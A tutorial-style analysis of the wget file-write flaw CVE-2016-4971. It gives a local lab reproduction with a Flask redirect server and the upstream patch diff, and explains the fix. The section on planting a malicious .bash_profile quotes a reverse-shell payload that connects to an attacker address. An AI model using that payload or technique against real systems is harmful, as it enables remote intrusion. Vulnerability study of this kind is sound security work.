7.1.3 CVE-2016-4971: wget Arbitrary File Upload Vulnerability


Vulnerability Description

wget is a tool for automatically downloading files over the network. It supports HTTP, HTTPS, and FTP, the three most common TCP/IP application protocols.

The vulnerability arises when an HTTP service redirects to an FTP service: wget by default trusts the HTTP server and uses the redirected FTP URL directly, without validating it or sanitizing the name under which the downloaded file is saved. If an attacker supplies a malicious URL, this redirect can be abused to write a file with an arbitrary name and arbitrary contents onto the victim's machine.
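To make the redirect concrete: the attacker-controlled HTTP endpoint only has to answer requests with a 302 whose Location header points at an FTP URL. Below is a minimal sketch using only the Python standard library; the port, addresses, and file names are illustrative, not part of the original advisory:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

class RedirectToFTP(BaseHTTPRequestHandler):
    def do_GET(self):
        # Answer every request with a 302 whose Location is an FTP URL.
        # A vulnerable wget follows the redirect and derives the local
        # file name from this attacker-chosen URL.
        self.send_response(302)
        self.send_header("Location", "ftp://127.0.0.1/harm.txt")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the demo quiet

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), RedirectToFTP).serve_forever()
```

The reproduction below does the same thing with Flask; either server works for this demonstration.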

Reproducing the Vulnerability

Recommended environment:

  Operating system     Ubuntu 16.04 (64-bit)
  Vulnerable software  wget 1.17.1
  Required software    vsftpd 3.0.3

First, install an FTP server:

  $ sudo apt-get install vsftpd

Edit its configuration file /etc/vsftpd.conf to allow anonymous access (restart the service afterwards so the change takes effect):

  # Allow anonymous FTP? (Disabled by default).
  anonymous_enable=YES

Next we need an HTTP service; here we use Flask:

  $ sudo pip install flask

Create two files, noharm.txt and harm.txt. The former is the file we legitimately request; the latter is the malicious file served after the redirect:

  $ ls
  harm.txt httpServer.py noharm.txt
  $ cat noharm.txt
  "hello world"
  $ cat harm.txt
  "you've been hacked"
  $ sudo cp harm.txt /srv/ftp
  $ sudo python httpServer.py
   * Running on http://0.0.0.0:80/ (Press CTRL+C to quit)

The code for httpServer.py is as follows:

  #!/usr/bin/env python
  from flask import Flask, redirect

  app = Flask(__name__)

  @app.route("/noharm.txt")
  def test():
      # Redirect the "harmless" request to the malicious FTP URL.
      return redirect("ftp://127.0.0.1/harm.txt")

  if __name__ == "__main__":
      app.run(host="0.0.0.0", port=80)

Next, in another shell (remember to switch to a different directory), run the following:

  $ ls | grep harm
  $ wget --version | head -n1
  GNU Wget 1.17.1 built on linux-gnu.
  $ wget 0.0.0.0/noharm.txt
  --2018-01-29 15:30:35-- http://0.0.0.0/noharm.txt
  Connecting to 0.0.0.0:80... connected.
  HTTP request sent, awaiting response... 302 FOUND
  Location: ftp://127.0.0.1/harm.txt [following]
  --2018-01-29 15:30:35-- ftp://127.0.0.1/harm.txt
             => noharm.txt
  Connecting to 127.0.0.1:21... connected.
  Logging in as anonymous ... Logged in!
  ==> SYST ... done. ==> PWD ... done.
  ==> TYPE I ... done. ==> CWD not needed.
  ==> SIZE harm.txt ... 21
  ==> PASV ... done. ==> RETR harm.txt ... done.
  Length: 21 (unauthoritative)
  noharm.txt 100%[==============================================>] 21 --.-KB/s in 0s
  2018-01-29 15:30:35 (108 KB/s) - noharm.txt saved [21]
  $ ls | grep harm
  noharm.txt
  $ cat noharm.txt
  "you've been hacked"

We can see that the redirect happened: although the downloaded content is that of the redirected file (harm.txt), the saved file name is still the originally requested one (noharm.txt). In other words, this wget behaves correctly.

It appears that although this system's wget reports version 1.17.1, it has already been patched. Let us build and install the unpatched release from source:

  $ sudo apt-get install libneon27-gnutls-dev
  $ wget https://ftp.gnu.org/gnu/wget/wget-1.17.1.tar.gz
  $ tar zxvf wget-1.17.1.tar.gz
  $ cd wget-1.17.1
  $ ./configure
  $ make && sudo make install

Make the request again:

  $ wget 0.0.0.0/noharm.txt
  --2018-01-29 16:32:15-- http://0.0.0.0/noharm.txt
  Connecting to 0.0.0.0:80... connected.
  HTTP request sent, awaiting response... 302 FOUND
  Location: ftp://127.0.0.1/harm.txt [following]
  --2018-01-29 16:32:15-- ftp://127.0.0.1/harm.txt
             => harm.txt
  Connecting to 127.0.0.1:21... connected.
  Logging in as anonymous ... Logged in!
  ==> SYST ... done. ==> PWD ... done.
  ==> TYPE I ... done. ==> CWD not needed.
  ==> SIZE harm.txt ... 21
  ==> PASV ... done. ==> RETR harm.txt ... done.
  Length: 21 (unauthoritative)
  harm.txt 100%[==============================================>] 21 --.-KB/s in 0s
  2018-01-29 16:32:15 (3.41 MB/s) - harm.txt saved [21]
  $ cat harm.txt
  "you've been hacked"

Bingo! This time the file was saved as harm.txt rather than being renamed to the originally requested file name.

The references demonstrate an attack targeting .bash_profile. Recall that .bash_profile is executed when a user logs in to Linux and is typically used to set environment variables. If that file is malicious, for example containing a payload such as bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9980 0>&1, then executing it hands a shell back to the attacker.

If a user runs a wget request in their home directory, and that directory contains no .bash_profile, then an attacker can exploit this vulnerability to save a malicious .bash_profile into the user's home directory. On the next login, the malicious code is executed and the attacker obtains a shell.
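The core of this trick is simply that pre-patch wget names the local file after the last path component of the redirected FTP URL. A simplified Python model of that naming behavior follows; it is an illustration with a name of our choosing, not wget's actual C code:

```python
import posixpath
from urllib.parse import urlparse

def vulnerable_local_name(redirected_url):
    # Pre-patch wget derives the local file name from the *redirected*
    # FTP URL, so the attacker chooses it, including dotfiles such as
    # .bash_profile.
    return posixpath.basename(urlparse(redirected_url).path)

# A redirect target of ftp://attacker/.bash_profile yields a local
# file literally named .bash_profile in the download directory.
```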

Vulnerability Analysis

The Patch

  $ git diff e996e322ffd42aaa051602da182d03178d0f13e1 src/ftp.c | cat
  commit e996e322ffd42aaa051602da182d03178d0f13e1
  Author: Giuseppe Scrivano <gscrivan@redhat.com>
  Date:   Mon Jun 6 21:20:24 2016 +0200

      ftp: understand --trust-server-names on a HTTP->FTP redirect

      If not --trust-server-names is used, FTP will also get the destination
      file name from the original url specified by the user instead of the
      redirected url.  Closes CVE-2016-4971.

      * src/ftp.c (ftp_get_listing): Add argument original_url.
      (getftp): Likewise.
      (ftp_loop_internal): Likewise.  Use original_url to generate the
      file name if --trust-server-names is not provided.
      (ftp_retrieve_glob): Likewise.
      (ftp_loop): Likewise.

      Signed-off-by: Giuseppe Scrivano <gscrivan@redhat.com>

  diff --git a/src/ftp.c b/src/ftp.c
  index cc90c3d..88a9777 100644
  --- a/src/ftp.c
  +++ b/src/ftp.c
  @@ -236,7 +236,7 @@ print_length (wgint size, wgint start, bool authoritative)
     logputs (LOG_VERBOSE, !authoritative ? _(" (unauthoritative)\n") : "\n");
   }

  -static uerr_t ftp_get_listing (struct url *, ccon *, struct fileinfo **);
  +static uerr_t ftp_get_listing (struct url *, struct url *, ccon *, struct fileinfo **);

   static uerr_t
   get_ftp_greeting(int csock, ccon *con)
  @@ -315,7 +315,8 @@ init_control_ssl_connection (int csock, struct url *u, bool *using_control_secur
     and closes the control connection in case of error.  If warc_tmp
     is non-NULL, the downloaded data will be written there as well.  */
   static uerr_t
  -getftp (struct url *u, wgint passed_expected_bytes, wgint *qtyread,
  +getftp (struct url *u, struct url *original_url,
  +        wgint passed_expected_bytes, wgint *qtyread,
           wgint restval, ccon *con, int count, wgint *last_expected_bytes,
           FILE *warc_tmp)
   {
  @@ -1188,7 +1189,7 @@ Error in server response, closing control connection.\n"));
         {
           bool exists = false;
           struct fileinfo *f;
  -        uerr_t _res = ftp_get_listing (u, con, &f);
  +        uerr_t _res = ftp_get_listing (u, original_url, con, &f);
           /* Set the DO_RETR command flag again, because it gets unset when
              calling ftp_get_listing() and would otherwise cause an assertion
              failure earlier on when this function gets repeatedly called
  @@ -1779,8 +1780,8 @@ exit_error:
     This loop either gets commands from con, or (if ON_YOUR_OWN is
     set), makes them up to retrieve the file given by the URL.  */
   static uerr_t
  -ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_file,
  -                   bool force_full_retrieve)
  +ftp_loop_internal (struct url *u, struct url *original_url, struct fileinfo *f,
  +                   ccon *con, char **local_file, bool force_full_retrieve)
   {
     int count, orig_lp;
     wgint restval, len = 0, qtyread = 0;
  @@ -1805,7 +1806,7 @@ ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_fi
       {
         /* URL-derived file.  Consider "-O file" name.  */
         xfree (con->target);
  -      con->target = url_file_name (u, NULL);
  +      con->target = url_file_name (opt.trustservernames || !original_url ? u : original_url, NULL);
         if (!opt.output_document)
           locf = con->target;
         else
  @@ -1923,8 +1924,8 @@ ftp_loop_internal (struct url *u, struct fileinfo *f, ccon *con, char **local_fi
         /* If we are working on a WARC record, getftp should also write
            to the warc_tmp file. */
  -      err = getftp (u, len, &qtyread, restval, con, count, &last_expected_bytes,
  -                    warc_tmp);
  +      err = getftp (u, original_url, len, &qtyread, restval, con, count,
  +                    &last_expected_bytes, warc_tmp);
         if (con->csock == -1)
           con->st &= ~DONE_CWD;
  @@ -2092,7 +2093,8 @@ Removing file due to --delete-after in ftp_loop_internal():\n"));
  /* Return the directory listing in a reusable format.  The directory
     is specifed in u->dir.  */
   static uerr_t
  -ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
  +ftp_get_listing (struct url *u, struct url *original_url, ccon *con,
  +                 struct fileinfo **f)
   {
     uerr_t err;
     char *uf;                     /* url file name */
  @@ -2113,7 +2115,7 @@ ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
     con->target = xstrdup (lf);
     xfree (lf);
  -  err = ftp_loop_internal (u, NULL, con, NULL, false);
  +  err = ftp_loop_internal (u, original_url, NULL, con, NULL, false);
     lf = xstrdup (con->target);
     xfree (con->target);
     con->target = old_target;
  @@ -2136,8 +2138,9 @@ ftp_get_listing (struct url *u, ccon *con, struct fileinfo **f)
     return err;
   }

  -static uerr_t ftp_retrieve_dirs (struct url *, struct fileinfo *, ccon *);
  -static uerr_t ftp_retrieve_glob (struct url *, ccon *, int);
  +static uerr_t ftp_retrieve_dirs (struct url *, struct url *,
  +                                 struct fileinfo *, ccon *);
  +static uerr_t ftp_retrieve_glob (struct url *, struct url *, ccon *, int);
   static struct fileinfo *delelement (struct fileinfo *, struct fileinfo **);
   static void freefileinfo (struct fileinfo *f);
  @@ -2149,7 +2152,8 @@ static void freefileinfo (struct fileinfo *f);
     If opt.recursive is set, after all files have been retrieved,
     ftp_retrieve_dirs will be called to retrieve the directories.  */
   static uerr_t
  -ftp_retrieve_list (struct url *u, struct fileinfo *f, ccon *con)
  +ftp_retrieve_list (struct url *u, struct url *original_url,
  +                   struct fileinfo *f, ccon *con)
   {
     static int depth = 0;
     uerr_t err;
  @@ -2310,7 +2314,10 @@ Already have correct symlink %s -> %s\n\n"),
             else                /* opt.retr_symlinks */
               {
                 if (dlthis)
  -                err = ftp_loop_internal (u, f, con, NULL, force_full_retrieve);
  +                {
  +                  err = ftp_loop_internal (u, original_url, f, con, NULL,
  +                                           force_full_retrieve);
  +                }
               }               /* opt.retr_symlinks */
             break;
           case FT_DIRECTORY:
  @@ -2321,7 +2328,10 @@ Already have correct symlink %s -> %s\n\n"),
           case FT_PLAINFILE:
             /* Call the retrieve loop.  */
             if (dlthis)
  -            err = ftp_loop_internal (u, f, con, NULL, force_full_retrieve);
  +            {
  +              err = ftp_loop_internal (u, original_url, f, con, NULL,
  +                                       force_full_retrieve);
  +            }
             break;
           case FT_UNKNOWN:
             logprintf (LOG_NOTQUIET, _("%s: unknown/unsupported file type.\n"),
  @@ -2386,7 +2396,7 @@ Already have correct symlink %s -> %s\n\n"),
     /* We do not want to call ftp_retrieve_dirs here */
     if (opt.recursive &&
         !(opt.reclevel != INFINITE_RECURSION && depth >= opt.reclevel))
  -    err = ftp_retrieve_dirs (u, orig, con);
  +    err = ftp_retrieve_dirs (u, original_url, orig, con);
     else if (opt.recursive)
       DEBUGP ((_("Will not retrieve dirs since depth is %d (max %d).\n"),
                depth, opt.reclevel));
  @@ -2399,7 +2409,8 @@ Already have correct symlink %s -> %s\n\n"),
     ftp_retrieve_glob on each directory entry.  The function knows
     about excluded directories.  */
   static uerr_t
  -ftp_retrieve_dirs (struct url *u, struct fileinfo *f, ccon *con)
  +ftp_retrieve_dirs (struct url *u, struct url *original_url,
  +                   struct fileinfo *f, ccon *con)
   {
     char *container = NULL;
     int container_size = 0;
  @@ -2449,7 +2460,7 @@ Not descending to %s as it is excluded/not-included.\n"),
         odir = xstrdup (u->dir);  /* because url_set_dir will free
                                      u->dir. */
         url_set_dir (u, newdir);
  -      ftp_retrieve_glob (u, con, GLOB_GETALL);
  +      ftp_retrieve_glob (u, original_url, con, GLOB_GETALL);
         url_set_dir (u, odir);
         xfree (odir);
  @@ -2508,14 +2519,15 @@ is_invalid_entry (struct fileinfo *f)
     GLOB_GLOBALL, use globbing; if it's GLOB_GETALL, download the whole
     directory.  */
   static uerr_t
  -ftp_retrieve_glob (struct url *u, ccon *con, int action)
  +ftp_retrieve_glob (struct url *u, struct url *original_url,
  +                   ccon *con, int action)
   {
     struct fileinfo *f, *start;
     uerr_t res;

     con->cmd |= LEAVE_PENDING;

  -  res = ftp_get_listing (u, con, &start);
  +  res = ftp_get_listing (u, original_url, con, &start);
     if (res != RETROK)
       return res;
     /* First: weed out that do not conform the global rules given in
  @@ -2611,7 +2623,7 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
     if (start)
       {
         /* Just get everything.  */
  -      res = ftp_retrieve_list (u, start, con);
  +      res = ftp_retrieve_list (u, original_url, start, con);
       }
     else
       {
  @@ -2627,7 +2639,7 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
       {
         /* Let's try retrieving it anyway.  */
         con->st |= ON_YOUR_OWN;
  -      res = ftp_loop_internal (u, NULL, con, NULL, false);
  +      res = ftp_loop_internal (u, original_url, NULL, con, NULL, false);
         return res;
       }
  @@ -2647,8 +2659,8 @@ ftp_retrieve_glob (struct url *u, ccon *con, int action)
     of URL.  Inherently, its capabilities are limited on what can be
     encoded into a URL.  */
  uerr_t
  -ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
  -          bool recursive, bool glob)
  +ftp_loop (struct url *u, struct url *original_url, char **local_file, int *dt,
  +          struct url *proxy, bool recursive, bool glob)
   {
     ccon con;                     /* FTP connection */
     uerr_t res;
  @@ -2669,16 +2681,17 @@ ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
     if (!*u->file && !recursive)
       {
         struct fileinfo *f;
  -      res = ftp_get_listing (u, &con, &f);
  +      res = ftp_get_listing (u, original_url, &con, &f);

         if (res == RETROK)
           {
             if (opt.htmlify && !opt.spider)
               {
  +              struct url *url_file = opt.trustservernames ? u : original_url;
                 char *filename = (opt.output_document
                                   ? xstrdup (opt.output_document)
                                   : (con.target ? xstrdup (con.target)
  -                                  : url_file_name (u, NULL)));
  +                                  : url_file_name (url_file, NULL)));
                 res = ftp_index (filename, u, f);
                 if (res == FTPOK && opt.verbose)
                   {
  @@ -2723,11 +2736,13 @@ ftp_loop (struct url *u, char **local_file, int *dt, struct url *proxy,
             /* ftp_retrieve_glob is a catch-all function that gets called
                if we need globbing, time-stamping, recursion or preserve
                permissions.  Its third argument is just what we really need.  */
  -          res = ftp_retrieve_glob (u, &con,
  +          res = ftp_retrieve_glob (u, original_url, &con,
                                      ispattern ? GLOB_GLOBALL : GLOB_GETONE);
           }
         else
  -        res = ftp_loop_internal (u, NULL, &con, local_file, false);
  +        {
  +          res = ftp_loop_internal (u, original_url, NULL, &con, local_file, false);
  +        }
       }
     if (res == FTPOK)
       res = RETROK;

Reading the patch, we find two main changes. One is in the function ftp_loop_internal(), which now checks both whether the --trust-server-names option was given and whether a redirect occurred:

  con->target = url_file_name (opt.trustservernames || !original_url ? u : original_url, NULL);

The other is in the function ftp_loop(), which does the same:

  struct url *url_file = opt.trustservernames ? u : original_url;

After the fix, unless --trust-server-names is given, wget by default uses the file name from the original URL rather than the one from the redirected URL. This resolves the issue.
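The patched selection can be modeled in a few lines of Python. This is only a sketch of the ternary expression above; the real code operates on struct url objects through url_file_name(), and the function and parameter names here are ours:

```python
def choose_target_name(redirected_name, original_name, trust_server_names=False):
    # Mirrors the patched expression
    #   opt.trustservernames || !original_url ? u : original_url
    # Trust the server's (redirected) name only when the user explicitly
    # asked for it, or when no redirect occurred (original_name is None).
    if trust_server_names or original_name is None:
        return redirected_name
    return original_name
```

For the reproduction above, choose_target_name("harm.txt", "noharm.txt") returns "noharm.txt", which matches the patched wget's behavior of saving the download under the originally requested name.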

References